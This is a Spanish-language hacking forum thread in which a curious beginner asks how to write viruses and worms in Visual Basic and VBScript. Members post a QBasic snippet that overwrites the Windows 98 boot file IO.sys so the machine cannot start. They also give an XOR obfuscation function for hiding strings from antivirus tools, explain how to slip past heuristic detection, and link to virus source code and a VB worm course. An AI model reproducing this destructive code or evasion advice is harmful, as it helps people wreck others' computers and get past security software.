Los típicos viruses y gusanos que no tienen interface, programados en vbscript...
En Microsoft Visual Basic 6.0, para programar en vbscript:
¿Es en Standard EXE, ActiveX EXE, ActiveX DLL o en donde?
Gracias ^^
Versión para imprimir
Los típicos viruses y gusanos que no tienen interface, programados en vbscript...
En Microsoft Visual Basic 6.0, para programar en vbscript:
¿Es en Standard EXE, ActiveX EXE, ActiveX DLL o en donde?
Gracias ^^
Eso, eso, una pregunta clara y concisa. Si explicaras mejor lo que quieres hacer y tus dudas supongo que se te podría ayudar mejor. Porque...¿ya tienes claro que quieres hacer?
No me he propuesto diseñar ningún virus ni nada parecido, es solo curiosidad pero creo que podria responder a mi pregunta bajandome el codigofuente de algún virus y viendo cómo está distribuido todo...
[Investigando]
Para programar en VBS en VB6 no se necesita ir en ningun modo especial...solo hace falta escribir la sintaxis den VBS en el kodigo del .exe y listo....
Salu2
si quieres codigos fuente de virus, mira aqui
http://www.hackhispano.com/foro/showthread.php?t=20758
gracias Cypress, pero en la web http://vx.netlux.org/exotic.php al darle a download me aparece este código:
DOS,‡¾Þž!{>`ID92HçàAúÿèCùà ‘DOSg"سüäföN¹à`Lß,yCúN®ÿ @ hB€Nudos.library`NùüÜNùüüNùáàNùâÚHçà yëÖ3üNùé¸#Èéº yëÚ3üNù.....sigue..
no se porqué veo cuadraditos, letras extrañas, alomejor me falta algún paquete de idioma no lo entiendo :S
ahora que lo dices, me paso con un archivo en batch, esperaba ver que habia hecho el programador y me mostro cualquier cosa :( como a ti, pense que era casualidad y lo borre.
Supongo que seran algo como tu dices, buscare y luego te informo
ya se lo que es, hay muchos de ellos que estan programados por rusos, o de otros paises,
y cuando son comentados te muestran esos simbolos(si es por falta de paketes).
pero puedes ver el source on line :)
gracias tio!
esque hace mucho entre en una web y me dice desea instalar paquetes de idioma? le dique no y me salian esos símbolos...
asi cambiando de tema, los codigo fuente de vbs de viruses son bastante cortitos no? yo me esperaba un código extenso y complicado!!
¿para realizar un virus para windows habria que estudiar el funcionamiento interno de windows?
Como todo, depende de lo que quieras hacer...
la malloria de los virus buenos astan echos en assembler, y para manejar bien asm tendrias que conocer la arquitectura del sistema, no solo para windows si no para cualquer SO
Tnks Cypress!!
Malenko, kual sería un ejemplo de virus para windows cuya programación no haria falta estudiar el funcionamiento interno de windows?
Ahora muchos ya optan por C para programar para Windows, aunque tambien los hay que son en ensamblador, pero ya decir que por usar un lenguaje u otro es bueno o malo...Cita:
Iniciado por Cypress
Uno que se limite a lo básico: replicarse. Aún así tendrias que saber la estructura de los ficheros PE.Cita:
Iniciado por 3nD_SuB
Tienes razon 100%, creo que mas importante que el lenguaje es el ingenio de cada uno para hacer un buen virus.Cita:
Iniciado por Malenko
Saludos
Cypress
al fin y al cabo todos los lenguajes de programacion puden ser utilizados para programar un virus...
pero... si ahora yo programo un virus que en un equipo no deje abrir algunas cosas, o que formatee, ese virus no sera detectado por un antivirus no? xD o el antivirus estudia automaticamente el código y decide si es malicioso? porque me parece que los antivirus tienen updates de listas de viruses...
jeje sería muy facil entonces estropearle a alguien el pc :P
Exacto, muchos (casi todos) hacen esto.....y en esto el NOD32 se lleva la palma...Cita:
o el antivirus estudia automaticamente el código y decide si es malicioso?
Salu2
No se hendrix...
me parece que los antivirus se bajan diariamente o casi diariamente de internet actualizaciones de los ultimos virus conocidos, pero si yo ahora creo un virus totalmente nuevo que lo que haga es por ejemplo formatear el ordenador, el antivirus no lo detectará, no? imposible... creo
Haber, informate sobre Heursitica de los Antivirus.....ke te krees ke los AV's solo comparan firmas kon los archivos del PC???si fuese asi yo ya tendria mi propio AV desde haria muuuucho tiempo....
Muchos buscan en la IAT la informacion del ejecutable (APIS ke usa y toda esa info) y si ven algo raro lo examinan mas a fondo hasta ke enkuentren algo ke determine ke es un Virus, por ejemplo ke se agrege al registro de Windwos....tu haz un script en VBS pasado a VB ke se agrege al registro, eskanealo kon el NOD32 y....voilà!!! el Nod32 salta???alguien a enviado mi archvio a los admins para ke lo testeen en un tiempo infracentesimal??? evidentemente no...
Salu2
MMM... ahora entiendo porqué los antivirus detectan como viruses algunos programas que no lo son... verán un fragmento de código amenazante y daran la voz de alarma...
mmm... muchisimas gracias Hendrix, me has sacado de una gran duda!!!
entonces, hacer viruses cada vez es más dificil que no lo detecten los antivirus no?
sip, pero mira esto...
no creo esto que voy a hacer se catalgoe como virus pero seguro que te jode la maquina
Podes hacer un programa que modifique informacion de archivos importantes, y que en consecuencia no ejecute correctamente windows.
ej, para win98.
^^ no creo que un antivirus detecte este archivo. Cuando lo ejecutes no te das cuenta de nada, pero cuando la reinices, chf, no inicia windows.Código:cls
open "c:\IO.sys" for output as#1
rem no me acuerdo bien, pero casi seguro que no te dejara iniciar windows
write#1, "Hecho por 3nD_SuB"
close#1
rem lo compilas y listo
rem perdon me olvde, es para qbasic, buscate el compilador y listo, es gratis
Todo depende de lo que quieras hacer. :)
SAludos
Cypress
Cypress como te lo curras tio ^^
en que lenguaje está ese código?
bueno cuanto más sepas programar mas facil te sera realizar exactamente lo que quieres... por lo tanto... a estudiar!!!
seguramente los antivirus cadavez sean mejores, pero nunca lo serán del todo!!
^^
xD xD xD xD Este kodigo esta en Visual Batch, o Visual Bachic o algo por el estilo...xD XD XD XD xD as mezclado VB y Batch....
Cls es de batch...luego habres el archivo kon kodigo de VB, luego pones komentario en kodigo batch y escribes en el archivo y lo cierras en VB....mezcla de Lengaujes!!!! :D
Haber, si kieren eskonder strings (kadenas) peligrosas a los AV's se rekiere de una funcion de encriptación...ke se enkargue de encritpar el kontenido y a su vez desenkriptarlo en ejecución....
les dejo este link ke les servira:
http://foro.el-hacker.com/index.php/topic,45606.0.html
Salu2
hey habla con propiedad o no digas nada, es para qbasic. y es mas si sacas el cls funciona para visual, YA QUE EL COMANDO REM TAMBIEN FUNCIONA :mad:
xD xD xD xD ok ok....no te enfades...xD xD yo no konocia QBasic, y ya ke batch tiene el Rem y el cls peus e dicho eso...
Salu2
Ostia Hendrix!!
gracias por la info!!!
pero...
Más o menos esta funcion en visual basic seria esto?
Public Function q(j) --------------------------> que es una funcion para todo el codigo
On Error Resume Next------------------------>en caso de error en el codigo acer lo siguiente:
For R = 1 To Len(j)--------------------------->no lo entiendo
q = q & Chr(Asc(Mid(j, R, 1)) Xor 7)----------->no lo entiendo
Next----------------------------------------->no lo entiendo
End Function--------------------------------->fin de la función
algien me puede explicar lo que hacen esas lineas de código?? se k para vosotros sera algo estúpido pero no lo entiendo =(
gracias^^
For R = 1 To Len(j)-----------> Para R = 1 hasta ke valga la longitud de la cande a a enkritpar (ke esta dentro de la string J) haz lo siguiente
q = q & Chr(Asc(Mid(j, R, 1)) Xor 7)-----------> *
Next ---> Incrementa el valor de R y vuelve al principio del for.
* Esto lo explikare por pasos:
Asc(Mid(j, R, 1) Esto lo ke ahce es kojer el karacter nº R (es decir, en este ejemplo kojeria karacter por caracter de toda la string, puesto ke el 1 ke esta despues de la R indica kuantos caracteres se van a kojer, para mas info (http://www.monografias.com/trabajos2/guiavb/guiavb.shtml, busken por Mid). Luego Esto lo ke hace es pasar a ascii el resutlado del la buskeda del Mid (es decir, kedara el numero ke okupa el karackter resultante en la tabla ASCII)
Xor 7) Esto le pasa el Operador Xor para enkritparlo. (definición de Xor: Operador a nivel de bits: suma lógica exclusiva, que da como resultado 1 si los dos bits son distintos y 0 si los dos bits son iguales.)
Chr( Finalmente lo ke hace Chr es pasar a karacter el nº del resutlado de la enkritapción.
q = q & Esto lo ke hace es poner dentro de q TODOS los resultados obtenidos....si solamente se pusiera q= pues el resutlado seria el ultimo caracter enkritpado. el q=q & lo ke hace es decir: poner dentro de q lo ke habia antes y el resutlado actual obtenido.
Espero ke haya kedado klaro... ;) ;) ;)
PD: Cabe decir ke este metodo de enkritpación es una chorrada....si kieren les paso algoritmos mios, ke haya en internet y algoritmos mios ke son (para mi nivel de criptoanalista) casi irrompibles.
Salu2
Bueno, yo de este tema domino más que de hacking así que os puedo dar una mano :D
Primero, la idea que tienes de porque un virus que formatee el disco duro va a ser más dificil de pillar. Un virus ha de buscar durar lo máximo posible sin ser detectado. Para mi un buen virus es el que consigue esto. Hacer un virus que no sea detectable ni por heurística, y que formatee el disco duro lo puede hacer cualquiera, y personalmente quien me venga fardando por hacer un virus que formatea me parece un lammer de los gordos. Si alguna vez te has leido una ezine de algun grupo creador de virus verás que tratan temas de como hacer dificil su estudio mediante tecnicas complejas de ocultación, encriptación, etc. y de hecho, había un grupo español (29A) cuyo lema era hacer virus pero sin payload destructivo.
Luego, en cuanto a los antivirus. Básicamente trabajan con 2 cosas: firmas (para virus conocidos) y heurística (combinada con ejecución virtual). La primera es obvia así que creo que no hace falta explicarla. La segunda se basa en buscar acciones "sospechosas" que un programa "normal" no hace. El ejemplo típico es acceder a las funciones del kernel.dll mediante una serie de funciones que usan típicamente los virus, o cosas por el estilo. El antivirus usa un peso a cada "característica" de manera que si salta una sola no pasa nada, pero si saltan varias...peligro. Antiguamente la heurística era algo tan sencillo como buscar una mini cadena, por ejemplo esto:
MOV AX, 20H
Que pasa si en lugar de eso haces:
MOV AX, 40H
MOV BX, 20H
DEC AX, BX o XCHG AX, BX
Que finalmente AX=20H pero te has saltado la heurística. Ahora para evitar esto lo que hacen es "ejecutar" el código de manera que así si que podrían ver si AX termina valiendo 20H.
En cuanto a si hacer un virus "indetectable" es cada vez más dificil? Es como preguntar si cada vez es más dificil colarte en un ordenador. No es que sea dificil, pero se han de investigar nuevas maneras. Hay algunas muy curiosas y muy antiguas. Para mi, el mecasnismo que más me ha gustado era el del virus DIR, que se escondía en los huecos libres de la FAT, de manera que no ocupaba espacio!!!! El virus no llegó muy lejos, pero la verdad es que la idea era muy buena. Luego con los ejecutables de Windows apareció una "versión" de este sistema y que se basaba en ocultar el virus en secciones del fichero que tenian hueco (sitios que habian para rellenar...).
P.D.: Con el tiempo que hace que no toco ASM fijo que la he cagado con el código de ejemplo, pero la idea por lo menos se tiene que pillar ;)
hay algo que nunca hablamos y que para mi es una de las cosas mas importates de un virus, la capacidad de reproducirse asi mismo, es decir distribuirse a otras computadoras a travez de Floppys, Cds, Internet, etc.
Eso nunca lo puede hacer ni con visual ni con qbasic. :(
porqué no Cypress?
Son lenguajes interpretados. No hay intérprete instalado, no hay ejecucción posible. Así de sencillo.Cita:
Iniciado por 3nD_SuB
joder!! =( ke mierdaa
pero troyanos en visual basic si que se puede no?
=D
Visual Basico no es interpretado....Cita:
Iniciado por Malenko
En VB es facilisimo hacer reproducciones....mirate mi kurso de Worms:
Descarga
Es para iniciarse en la proramacion de Worms en VB.
Yo estaba haciendo un geenrador de worms en VB para krear gusando en VBS polimorficos...pero los VBS estan practicamente obsoletos... :)
Salu2
El título del hilo que pone? Visual Basic o Visual Basic SCRIPT??? Ya se yo que visual basic es compilado, pero basic (qbasic) o un VB Script son interpretados. Eso no quiere decir que no se puedan hacer gusanos, pero si no hay interprete...pues lo dicho. Si he puesto esa frase es por algo, sino mirate a que se refería 3nD_SuBCita:
Iniciado por Hendrix.
Ok...es cierto.... ;) ;)
Por cierto, en los XP viene el interprete de los vbs por defecto o se tiene ke instalar el VB??
Salu2
bueno, XP en todo caso vendría con el WSH pero creo recordar que no viene por defecto, por temas de seguridad, pero no estoy seguro 100%
hey, yo tengo un compilador de qbasic :)
Pero eso puede ser como decir "tengo compilador de pascal" puedes hacer un virus en pascal (que los hay) y lo puedes compilar, pero luego no te irá en ningún PC moderno (los ejecutables "petaban" en mas de un Pentium a 200).Cita:
Iniciado por Cypress
en pascal tengo una vercion moderna llamada free pascal.
y corre perfectamente en windows.
(y mi compilador de qbasic tambien corre para windows)
Yo hacía referencia al TurboPascal 7, que para mi es el de toda la vida, el "clásico" :P